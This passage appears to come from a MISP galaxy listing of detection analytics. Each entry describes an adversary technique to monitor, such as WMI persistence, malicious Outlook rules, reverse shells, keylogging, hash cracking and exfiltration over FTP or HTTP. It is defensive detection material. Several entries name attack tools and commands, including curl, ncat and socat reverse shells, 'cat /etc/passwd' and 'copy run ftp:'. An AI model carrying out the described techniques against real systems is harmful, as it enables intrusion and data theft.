Monitor for creation of WMI EventFilter, EventConsumer, and FilterToConsumerBinding objects through WMI or MOF file execution. Detect command-line execution of mofcomp.exe, usage of Register-WmiEvent via PowerShell, and anomalous child processes of WmiPrvSE.exe that indicate triggered execution. Look for lateral anomalies in process lineage and WMI logging channels.

Internal MISP references

UUID 1a0640f0-e286-405f-9ab3-507c1abb77da which can be used as unique global reference for Analytic 0236 - AN0236 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0236
mitre_platforms ['Windows']

Analytic 0263 - AN0263

Adversary uses a tool like Ruler or MFCMapi to create a malicious Outlook rule that triggers execution upon receipt of a crafted email. On email delivery, Outlook executes the rule, resulting in code execution (e.g., launching mshta.exe or PowerShell). Outlook spawns a non-standard child process, often unsanctioned, without user interaction.

Internal MISP references

UUID 22cba5f6-b3d5-4a1a-9275-ed7db0bd4c7c which can be used as unique global reference for Analytic 0263 - AN0263 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0263
mitre_platforms ['Windows']

Analytic 0632 - AN0632

Detects binaries disguised as media or document types through extension-only masquerading or by modifying the file signature. Observes execution of files whose extension is not typically executable (.jpg, .txt), yet have valid Mach-O headers or execute via Terminal or launch services.

Internal MISP references

UUID 2bce7f8d-90c1-4835-9ce9-832e5e3a37d6 which can be used as unique global reference for Analytic 0632 - AN0632 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0632
mitre_platforms ['macOS']

Analytic 0623 - AN0623

Detects SCCM, Intune, or remote push execution spawning scripts or binaries from SYSTEM context or unusual consoles (e.g., cmtrace.exe launching PowerShell or cmd.exe).

Internal MISP references

UUID 39ec0aa6-935a-44d3-b206-211981dec3bd which can be used as unique global reference for Analytic 0623 - AN0623 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0623
mitre_platforms ['Windows']

Analytic 0362 - AN0362

Modification of plist files to set apple.awt.UIElement or similar flags hiding app icons and windows, and dscl/command-line activity that suppresses visibility. Defender view: correlation of plist modifications with unexpected hidden user applications.

Internal MISP references

UUID 3d9fb03c-fcc9-4f19-9c49-09d8321f28b9 which can be used as unique global reference for Analytic 0362 - AN0362 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0362
mitre_platforms ['macOS']

Analytic 0326 - AN0326

Creation of LaunchAgents or LaunchDaemons with names resembling known system services but executing non-Apple signed code or scripts.

Internal MISP references

UUID 7e3c05c9-5e49-416c-a0c9-eb7631ea5e7e which can be used as unique global reference for Analytic 0326 - AN0326 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0326
mitre_platforms ['macOS']

Analytic 0732 - AN0732

Anomalous or bulk download activity from private or restricted repositories by non-developer or privileged accounts, often preceded by unusual login behavior (e.g., unfamiliar geo, OAuth token use, elevated API rate).

Internal MISP references

UUID 0aa20e10-ec46-4acf-810e-e8ed038d7744 which can be used as unique global reference for Analytic 0732 - AN0732 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0732
mitre_platforms ['SaaS']

Analytic 0372 - AN0372

Adversary-created named mutex using system APIs (e.g., CreateMutexW) followed by conditional process termination or alternate code path indicating malware avoiding reinfection.

Internal MISP references

UUID 1282f497-ce04-4151-9bd0-4eedbf4530b6 which can be used as unique global reference for Analytic 0372 - AN0372 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0372
mitre_platforms ['Windows']

Analytic 0237 - AN0237

Detection of processes that load or decode encrypted/encoded files in memory and subsequently execute or inject them, indicating payload unpacking or memory-resident malware.

Internal MISP references

UUID 4f985435-9144-4a8f-aca0-598f788855b7 which can be used as unique global reference for Analytic 0237 - AN0237 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0237
mitre_platforms ['Windows']

Analytic 0723 - AN0723

Forged web credentials in Office Suite contexts may appear as abnormal authentication headers in Outlook or Teams traffic, or unexplained OAuth grants in M365/Azure logs. Defenders should correlate token usage events with missing authentication flows and mismatched device/user context.

Internal MISP references

UUID 9735a0b1-df29-49fe-b0f7-973c0b513e8d which can be used as unique global reference for Analytic 0723 - AN0723 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0723
mitre_platforms ['Office Suite']

Analytic 0273 - AN0273

Processes that utilize AppleScript, CGWindowListCopyWindowInfo, or NSRunningApplication APIs to list active application windows and foreground processes.

Internal MISP references

UUID a31400ee-ac3e-408e-aa4d-fb2b470142ab which can be used as unique global reference for Analytic 0273 - AN0273 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0273
mitre_platforms ['macOS']

Analytic 0327 - AN0327

Correlates inbound network access to remote service ports (e.g., SMB/RPC 445/135, RDP 3389, WinRM 5985/5986) with near-time instability in the target service (crash, abnormal restart), suspicious child process creation under the service, and post-access lateral-movement behaviors. The chain indicates likely exploitation rather than normal administration.

Internal MISP references

UUID f8c99f4f-f61e-436c-a093-c97969c9b038 which can be used as unique global reference for Analytic 0327 - AN0327 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0327
mitre_platforms ['Windows']

Analytic 0328 - AN0328

Links inbound network access to SSHD/SMB/NFS/Databases or custom daemons with subsequent daemon crash/restart, core dump, or spawning of shells/reverse shells from the service context, indicating remote exploitation.

Internal MISP references

UUID 70e3066e-6ba3-444b-8e88-dfc3575f2706 which can be used as unique global reference for Analytic 0328 - AN0328 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0328
mitre_platforms ['Linux']

Analytic 0382 - AN0382

Detects hosts transmitting large volumes of SMTP, IMAP, or POP3 traffic to external IPs or relays that aren't associated with the enterprise mail infrastructure.

Internal MISP references

UUID 784b7a50-cdc5-4161-8b52-2be5e5de19ac which can be used as unique global reference for Analytic 0382 - AN0382 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0382
mitre_platforms ['Network Devices']

Analytic 0283 - AN0283

Detects use of tools/scripts accessing input devices like /dev/input/* or evdev via suspicious processes lacking GUI context.

Internal MISP references

UUID 79f3bf7a-cf35-442c-b707-ba4dabd6ed62 which can be used as unique global reference for Analytic 0283 - AN0283 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0283
mitre_platforms ['Linux']

Analytic 0832 - AN0832

Detects execution of archiving utilities (tar, gzip, bzip2, xz, zip, openssl) followed by suspicious archive file creation. Correlates archive creation in temporary or staging directories with execution of commands involving compression or encryption options.

Internal MISP references

UUID 89cfa3ac-22c9-462f-a6a5-b142124e22a5 which can be used as unique global reference for Analytic 0832 - AN0832 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0832
mitre_platforms ['Linux']

Analytic 0823 - AN0823

Detects suspicious DNS/ARP poisoning attempts, unauthorized modifications to registry/network configuration, or abnormal TLS downgrade activity. Correlates changes in system configuration with subsequent unusual network flows or authentication events.

Internal MISP references

UUID c15f60a8-6e58-460f-8dcf-1bce272b5eaf which can be used as unique global reference for Analytic 0823 - AN0823 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0823
mitre_platforms ['Windows']

Analytic 0238 - AN0238

Detection of suspicious use of shell utilities or scripts that decode or decrypt a payload and execute it without writing to disk.

Internal MISP references

UUID e9de9003-46e9-438f-929a-94a33c2eb5bd which can be used as unique global reference for Analytic 0238 - AN0238 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0238
mitre_platforms ['Linux']

Analytic 0239 - AN0239

Detection of encoded payloads being decoded and executed in-memory using scripting tools or third-party decoders.

Internal MISP references

UUID 0e832ea1-a261-4bdd-8fc8-ae049468c347 which can be used as unique global reference for Analytic 0239 - AN0239 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0239
mitre_platforms ['macOS']

Analytic 0329 - AN0329

Detects exploitation targeting ESXi/vCenter by correlating attempts to reach known exploitable endpoints (OpenSLP 427, CIM 5989, Hostd/Vpxa HTTPS 443, ESXi SOAP) with vmkernel/hostd crashes, unexpected hostd/vpxa restarts, or new reverse/outbound connections from ESXi host/vCenter to internal assets.

Internal MISP references

UUID 17b82342-cc75-4dcd-ad98-f313cd2a2b69 which can be used as unique global reference for Analytic 0329 - AN0329 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0329
mitre_platforms ['ESXi']

Analytic 0293 - AN0293

Execution of hash cracking binaries or scripts (e.g., john, hashcat) following access to the shadow file or dumped hashes.

Internal MISP references

UUID 7efdc4e3-8a2e-4d0d-8ced-03155f2c55ac which can be used as unique global reference for Analytic 0293 - AN0293 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0293
mitre_platforms ['Linux']

Analytic 0923 - AN0923

curl, wget, ncat, socat, or custom binaries initiate outbound traffic to Internet-based proxies (e.g., via VPS or CDN). Behavior may include reverse shell constructs or persistent outbound beacons.

Internal MISP references

UUID 9a0c2390-f8e9-4f03-ae21-0e1e876fed89 which can be used as unique global reference for Analytic 0923 - AN0923 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0923
mitre_platforms ['Linux']

Analytic 0932 - AN0932

Execution of CMSTP.exe with arguments pointing to suspicious or remote INF/SCT/DLL payloads, optionally followed by outbound network connections to untrusted IPs, process injection via COM interfaces (CMSTPLUA, CMLUAUTIL), registry modifications registering malicious profiles, or creation of suspicious INF/DLL/SCT files prior to execution.

Internal MISP references

UUID ae250934-772b-43a5-9a29-9cbd92972858 which can be used as unique global reference for Analytic 0932 - AN0932 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0932
mitre_platforms ['Windows']

Analytic 0392 - AN0392

Detects adversary behavior that deletes artifacts (e.g., dropped payloads, evidence files) using native or external utilities (e.g., del, erase, SDelete). Detects deletion events correlated with unusual process lineage or timing post-execution.

Internal MISP references

UUID b1ee9791-91f8-4788-9e08-c40eedbcf08b which can be used as unique global reference for Analytic 0392 - AN0392 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0392
mitre_platforms ['Windows']

Analytic 0244 - AN0244

Detects non-system processes accessing /dev/input/* or issuing ptrace/evdev syscalls used for reading keystroke buffers directly.

Internal MISP references

UUID 0c122a8e-bcb0-4756-8a63-193c52d61d90 which can be used as unique global reference for Analytic 0244 - AN0244 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0244
mitre_platforms ['Linux']

Analytic 0424 - AN0424

Detects file access or compression utilities followed by outbound connections using curl, wget, ftp, or custom binaries communicating over unencrypted protocols.

Internal MISP references

UUID ad5fb8d4-7f1c-4442-a4e5-96592364c4cc which can be used as unique global reference for Analytic 0424 - AN0424 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0424
mitre_platforms ['Linux']

Analytic 0442 - AN0442

Monitor for unauthorized or unusual modifications to cloud resource hierarchies such as AWS Organizations or Azure Management Groups. Defenders may observe anomalous calls to APIs like LeaveOrganization, CreateAccount, MoveAccount, or Azure subscription transfers. Correlate account activity with administrative role assignments, tenant transfers, or new subscription creation that deviates from organizational baselines. Multi-event correlation should track role elevation followed by hierarchy modifications within a short time window.

Internal MISP references

UUID e246212e-aca3-489d-a2d9-7e24f7c3516c which can be used as unique global reference for Analytic 0442 - AN0442 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0442
mitre_platforms ['IaaS']

Analytic 0542 - AN0542

Detection of XProtect or AV quarantining a known tool, followed by modification (file size, hash, string) and subsequent re-execution by the same or related user.

Internal MISP references

UUID 3ef92295-ecbf-417a-b72a-f6cd189ca3a1 which can be used as unique global reference for Analytic 0542 - AN0542 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0542
mitre_platforms ['macOS']

Analytic 0254 - AN0254

Adversary launches built-in system tools (e.g., whoami, query user, net user) or scripts that enumerate user account information via local execution or remote API queries (e.g., WMI, PowerShell).

Internal MISP references

UUID 5d024a50-97d8-4b81-8cc6-3db4fff2712c which can be used as unique global reference for Analytic 0254 - AN0254 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0254
mitre_platforms ['Windows']

Analytic 0425 - AN0425

Detects abnormal outbound HTTP/FTP connections by local scripts or binaries outside of standard browser activity, following access to local documents or user data.

Internal MISP references

UUID b608c89f-ce2c-4993-8522-7b2731851606 which can be used as unique global reference for Analytic 0425 - AN0425 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0425
mitre_platforms ['macOS']

Analytic 0245 - AN0245

Detects unauthorized TCC access or use of Quartz Event Services (CGEventTapCreate) or IOHID for event tap installation within unexpected processes.

Internal MISP references

UUID da140e65-e30c-4cf2-8961-82fb200a7f0b which can be used as unique global reference for Analytic 0245 - AN0245 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0245
mitre_platforms ['macOS']

Analytic 0452 - AN0452

Monitor PAM and syslog entries for unusual frequency of login attempts that trigger MFA prompts, particularly when MFA challenges do not match expected user behavior.

Internal MISP references

UUID e36b2d32-05a8-4bcf-b7cf-58dc3ad4c0d3 which can be used as unique global reference for Analytic 0452 - AN0452 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0452
mitre_platforms ['Linux']

Analytic 0524 - AN0524

Tracks suspicious use of ESXi shell commands or PowerCLI to delete logs, rotate system files, or tamper with hostd/vpxa history.

Internal MISP references

UUID f9b13a61-0110-4882-9384-3468d22ac221 which can be used as unique global reference for Analytic 0524 - AN0524 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0524
mitre_platforms ['ESXi']

Analytic 0246 - AN0246

Keylogging on legacy network devices via unauthorized system image modification or remote capture of console keystrokes (telnet, SSH) through altered firmware or man-in-the-middle key sniffing.

Internal MISP references

UUID 63a1b615-8389-4776-a79c-6db04037a7b7 which can be used as unique global reference for Analytic 0246 - AN0246 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0246
mitre_platforms ['Network Devices']

Analytic 0426 - AN0426

Detects shell-based scripts accessing configuration files or snapshots and transmitting them over unencrypted protocols such as FTP or HTTP to non-management IPs.

Internal MISP references

UUID 82f3feb5-f17e-4c1c-b67d-c8331d220905 which can be used as unique global reference for Analytic 0426 - AN0426 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0426
mitre_platforms ['ESXi']

Analytic 0264 - AN0264

Adversary adds a new Outlook rule with modified or obfuscated PR_RULE_MSG_NAME and PR_RULE_MSG_PROVIDER attributes using MFCMapi or Ruler. The rule is triggered when email arrives, executing embedded or external code. Mailbox audit logs or the Unified Audit Log show an automated rule-triggered action without user interaction.

Internal MISP references

UUID 8c0c52d0-7357-4073-84fc-d262632d268f which can be used as unique global reference for Analytic 0264 - AN0264 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0264
mitre_platforms ['Office Suite']

Analytic 0462 - AN0462

Adversary installs/uses packet-capture or raw-socket capability (WinPcap/Npcap, wpcap/packet DLLs or raw socket attach) and sets a filter. A crafted inbound packet is observed; within a short window the host process that loaded capture libraries initiates an outbound connection (e.g., reverse shell) to the packet origin.

Internal MISP references

UUID 98d733c2-370b-4cd0-8ec6-226a1ca19604 which can be used as unique global reference for Analytic 0462 - AN0462 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0462
mitre_platforms ['Windows']

Analytic 0624 - AN0624

Detects remote scripts or binaries deployed via Puppet, Chef, Ansible, or shell scripts from orchestration servers executing outside maintenance windows or in unmanaged nodes.

Internal MISP references

UUID bbb8adb2-434a-483e-af3c-4843241e2158 which can be used as unique global reference for Analytic 0624 - AN0624 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0624
mitre_platforms ['Linux']

Analytic 0642 - AN0642

Suspicious querying of organization-wide directory data via Google Workspace Directory API or Outlook GAL sync in high volume from abnormal users, service accounts, or unknown device contexts.

Internal MISP references

UUID e0ad2e3d-c109-4af0-ac44-0d4cd45407c2 which can be used as unique global reference for Analytic 0642 - AN0642 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0642
mitre_platforms ['Office Suite']

Analytic 0724 - AN0724

Detects file reads across locations followed by writes to temp or staging directories, often compressed or encrypted, indicating local staging behavior.

Internal MISP references

UUID 561fb700-686a-4583-96a9-77a55358d357 which can be used as unique global reference for Analytic 0724 - AN0724 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0724
mitre_platforms ['Windows']

Analytic 0427 - AN0427

Detects use of unencrypted protocols (e.g., TFTP, FTP, HTTP) to transfer configuration files, routing tables, or logs to untrusted IP addresses, especially using administrative commands like copy run ftp:.

Internal MISP references

UUID 611778c2-9de4-4066-b7d1-78752891c32e which can be used as unique global reference for Analytic 0427 - AN0427 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0427
mitre_platforms ['Network Devices']

Analytic 0274 - AN0274

Behavioral chain: (1) An actor creates or modifies a BITS job via bitsadmin.exe, PowerShell BITS cmdlets, or COM; (2) the job performs HTTP(S)/SMB network transfers while the owning user is logged on; (3) upon job completion/error, BITS launches a notify command (SetNotifyCmdLine) from svchost.exe -k netsvcs -s BITS, often establishing persistence by keeping long-lived jobs. The strategy correlates process creation, command/script telemetry, BITS-Client operational events, and network connections initiated by BITS.

Internal MISP references

UUID 6fba9520-c6ce-4a8f-8005-d33546a10406 which can be used as unique global reference for Analytic 0274 - AN0274 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0274
mitre_platforms ['Windows']

Analytic 0742 - AN0742

Abnormal CPU/memory usage by unauthorized processes with outbound connections to known mining pools or using cron jobs/scripts to maintain persistence.

Internal MISP references

UUID 7d099bc4-1a19-4aa3-b12b-a9390e98408a which can be used as unique global reference for Analytic 0742 - AN0742 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0742
mitre_platforms ['Linux']

Analytic 0247 - AN0247

Behavioral sequence where removable media is mounted, files are written/updated, and subsequently read/executed on a separate host, suggesting removable-media relay communication.

Internal MISP references

UUID b355ae5d-3cd6-4594-8bd9-8fed59e02326 which can be used as unique global reference for Analytic 0247 - AN0247 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0247
mitre_platforms ['Windows']

Analytic 0472 - AN0472

Adversary registers a malicious Microsoft Exchange transport agent DLL (.NET assembly), configures it via PowerShell or Exchange Management Shell, and persists code execution by manipulating email processing logic based on rules or headers.

Internal MISP references

UUID c94b2c2b-8885-4f5e-abec-e80ab0a24f21 which can be used as unique global reference for Analytic 0472 - AN0472 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0472
mitre_platforms ['Windows']

Analytic 0284 - AN0284

Monitors for TCC-bypassing or unauthorized access to input services like IOHIDSystem or Quartz Event Services used in keylogging or screen monitoring.

Internal MISP references

UUID 13f8fd10-3982-4a10-85c1-4641712c7286 which can be used as unique global reference for Analytic 0284 - AN0284 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0284
mitre_platforms ['macOS']

Analytic 0842 - AN0842

A remote source rapidly touches a short sequence of closed ports (SYN→RST/S0) on a Windows host. Within a short window the host changes firewall state (WFP rule added/modified or service starts listening) and then the same source completes the first successful handshake to the newly opened port.

Internal MISP references

UUID 22ff1717-6ba8-4908-b795-edf0c41a997e which can be used as unique global reference for Analytic 0842 - AN0842 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0842
mitre_platforms ['Windows']

Analytic 0824 - AN0824

Detects unauthorized edits to /etc/hosts, /etc/resolv.conf, or suspicious ARP broadcasts. Correlates file modifications with subsequent unexpected network sessions or service creation.

Internal MISP references

UUID 3cdef7d3-4ca6-4d4a-933b-656af73f8433 which can be used as unique global reference for Analytic 0824 - AN0824 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0824
mitre_platforms ['Linux']

Analytic 0248 - AN0248

Detection of file write-access to USB-mount directories (e.g., /media/, /run/media/) followed by same-file access or execution on another host.

Internal MISP references

UUID 6f8fdb88-56d1-454e-9a35-3b7170011ca2 which can be used as unique global reference for Analytic 0248 - AN0248 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0248
mitre_platforms ['Linux']

Analytic 0428 - AN0428

Detection of raw access to physical drives, modification of boot records (MBR/VBR), and suspicious file creation or alteration within the EFI System Partition (ESP). Correlates privileged process execution with low-level disk modification and unexpected driver or firmware interactions.

Internal MISP references

UUID 7edc8ff6-0616-4fab-a7b7-1bd3d08cc0b1 which can be used as unique global reference for Analytic 0428 - AN0428 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0428
mitre_platforms ['Windows']

Analytic 0482 - AN0482

Defenders may observe adversary attempts to alter or replace a network device’s operating system image through anomalous CLI commands, unexpected firmware updates, integrity check failures, or mismatches in version and checksum validation. Suspicious behavior includes modification of image files on storage, OS version output inconsistent with baselines, unexpected reloads or reboots after image replacement, and changes to boot configuration that load non-standard system images.

Internal MISP references

UUID 868abb22-3d6c-4172-bf38-9e3c1aba4dae which can be used as unique global reference for Analytic 0482 - AN0482 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0482
mitre_platforms ['Network Devices']

Analytic 0294 - AN0294

Unsigned or scripting-based processes invoking password cracking binaries or accessing hashed credential artifacts post-login.

Internal MISP references

UUID 3682e3c9-33a7-4328-b0c5-73c8bbcb9b53 which can be used as unique global reference for Analytic 0294 - AN0294 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0294
mitre_platforms ['macOS']

Analytic 0429 - AN0429

Detection of suspicious write operations to block devices, modifications of bootloader files (GRUB, initrd, vmlinuz), and unexpected changes within the EFI System Partition. Monitors privileged execution of utilities like dd, grub-install, or efibootmgr that modify boot sectors or loader entries.

Internal MISP references

UUID 3d209345-1676-4170-b1d0-d6538bce06c4 which can be used as unique global reference for Analytic 0429 - AN0429 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0429
mitre_platforms ['Linux']

Analytic 0942 - AN0942

Detects execution of AutoHotKey or AutoIT interpreters or compiled scripts used for unauthorized automation, command execution, or payload delivery, correlated with anomalous process lineage, command-line arguments, or script creation events.

Internal MISP references

UUID 7975ae39-8c6b-45cc-9280-98e94b666c85 which can be used as unique global reference for Analytic 0942 - AN0942 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0942
mitre_platforms ['Windows']

Analytic 0492 - AN0492

Automated or scripted HTTP/TLS flooding from one VM or cloud instance against another service, exploiting compute-based billing or exhaustion of service infrastructure.

Internal MISP references

UUID 7dbd928f-da93-4cbf-af73-ac5987a7858a which can be used as unique global reference for Analytic 0492 - AN0492 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0492
mitre_platforms ['IaaS']

Analytic 0249 - AN0249

Correlates removable volume mounts (disk arbitration) with file I/O events on that volume, followed by execution of the same file shortly after insertion.

Internal MISP references

UUID bb687663-4b26-46ef-a176-e188f538d399 which can be used as unique global reference for Analytic 0249 - AN0249 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0249
mitre_platforms ['macOS']

Analytic 0924 - AN0924

AppleScript or terminal sessions launch tools (curl, nc, ssh) to external IPs not commonly accessed. Outbound connections are made by LaunchAgents/LaunchDaemons, often masquerading as system services.

Internal MISP references

UUID cd7fee55-79e6-42f4-9c68-e653cc8a1d24 which can be used as unique global reference for Analytic 0924 - AN0924 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0924
mitre_platforms ['macOS']

Analytic 0255 - AN0255

Adversary runs commands like whoami, id, w, or cat /etc/passwd from non-interactive or scripting contexts to enumerate system user details.

Internal MISP references

UUID 73b31f73-bc47-45c1-9c02-fd8eaacb2f9b which can be used as unique global reference for Analytic 0255 - AN0255 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0255
mitre_platforms ['Linux']

Analytic 0552 - AN0552

Alterations to plist configuration files (RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, MessageRules.plist) that define email hiding or filtering rules. Defender perspective: unexpected changes in these files associated with Mail.app processes.

Internal MISP references

UUID 863a9028-6b2a-46c6-b696-dd310937fbf9 which can be used as unique global reference for Analytic 0552 - AN0552 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0552
mitre_platforms ['macOS']

Analytic 0525 - AN0525

Detects deletion or hiding of security-related mail rules, audit mailboxes, or calendar/log sync artifacts indicative of tampering post-intrusion.

Internal MISP references

UUID c15d6b5e-bbb7-4dc7-8b59-8ce2c0663c05 which can be used as unique global reference for Analytic 0525 - AN0525 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0525
mitre_platforms ['Office Suite']

Analytic 0256 - AN0256

Adversary uses dscl, who, or environment variables like $USER to identify accounts or sessions via Terminal or malicious LaunchAgents.

Internal MISP references

UUID 0979e7f1-9d0a-4549-be8f-88979df5c8d7 which can be used as unique global reference for Analytic 0256 - AN0256 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0256
mitre_platforms ['macOS']

Analytic 0652 - AN0652

Unusual use of steganographic or media processing binaries (e.g., steghide, ffmpeg, imagemagick) followed by outbound communication to external IPs with high data output and media MIME types.

Internal MISP references

UUID 191d5ea7-ff08-4433-ba1b-1c0ed755ca67 which can be used as unique global reference for Analytic 0652 - AN0652 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0652
mitre_platforms ['Linux']

Analytic 0526 - AN0526

Use of AWS STS or GCP IAM APIs to request temporary tokens or federation sessions inconsistent with normal account activity, including from unexpected principals or regions.

Internal MISP references

UUID 43ccb88d-8d8a-4ddb-9ffd-3d897fba76a3 which can be used as unique global reference for Analytic 0526 - AN0526 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0526
mitre_platforms ['IaaS']

Analytic 0265 - AN0265

Account attribute changes (e.g., password set, group membership, servicePrincipalName, logon hours) correlated with unusual process lineage or timing, indicating privilege escalation or persistence via valid accounts.

Internal MISP references

UUID 842ba5ee-dcd0-42bd-9ef8-867a4ab1c703 which can be used as unique global reference for Analytic 0265 - AN0265 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0265
mitre_platforms ['Windows']

Analytic 0625 - AN0625

Detects script or binary execution initiated via JAMF, Munki, or custom MDM agents outside of baseline, or JAMF launching new Terminal or osascript processes from remote command payloads.

Internal MISP references

UUID 94e3c24f-01ee-45bc-89c0-7024ada7cc66 which can be used as unique global reference for Analytic 0625 - AN0625 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0625
mitre_platforms ['macOS']

Analytic 0562 - AN0562

Use of esxcli network commands (e.g., esxcli network nic list, esxcli network ip interface ipv4 get) via SSH or hostd to enumerate adapter and IP information.

Internal MISP references

UUID cb70ad2f-7c96-4669-baed-3007246b0630 which can be used as unique global reference for Analytic 0562 - AN0562 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0562
mitre_platforms ['ESXi']

Analytic 0572 - AN0572

Monitor for execution of hypervisor management commands such as esxcli vm process list or vim-cmd vmsvc/getallvms that enumerate virtual machines. Defenders observe unexpected users issuing VM listing commands outside normal administrative workflows.

Internal MISP references

UUID 44bb0cf8-12ee-4a8f-8701-6c787a008bd8 which can be used as unique global reference for Analytic 0572 - AN0572 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0572
mitre_platforms ['ESXi']

Analytic 0275 - AN0275

Unexpected write operations to BIOS/UEFI firmware regions or EFI boot partitions that do not correlate with legitimate vendor firmware updates. API calls or utilities such as fwupdate.exe or vendor flash tools executed from non-administrative or non-IT management accounts. Suspicious raw disk writes targeting System Firmware GUID partitions followed by abnormal reboot sequences.

Internal MISP references

UUID 59d44906-a35e-4b0f-ab84-df3bfa6df8f9 which can be used as unique global reference for Analytic 0275 - AN0275 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0275
mitre_platforms ['Windows']

Analytic 0257 - AN0257

Adversary executes CLI commands like show users, show ssh, or attempts to dump AAA user lists from routers or switches.

Internal MISP references

UUID a5cc0eac-af18-4fe2-ac06-88a5cfddf014 which can be used as unique global reference for Analytic 0257 - AN0257 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0257
mitre_platforms ['Network Devices']

Analytic 0725 - AN0725

Detects aggregation of files from different directories into /tmp, /mnt, or user-specified directories with archiving tools like tar or gzip.

Internal MISP references

UUID c5e7b8a9-72f6-40db-be4a-ec17386d884f which can be used as unique global reference for Analytic 0725 - AN0725 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0725
mitre_platforms ['Linux']

Analytic 0527 - AN0527

OAuth or SAML access tokens reused across multiple sessions or clients without corresponding MFA or login activity.

Internal MISP references

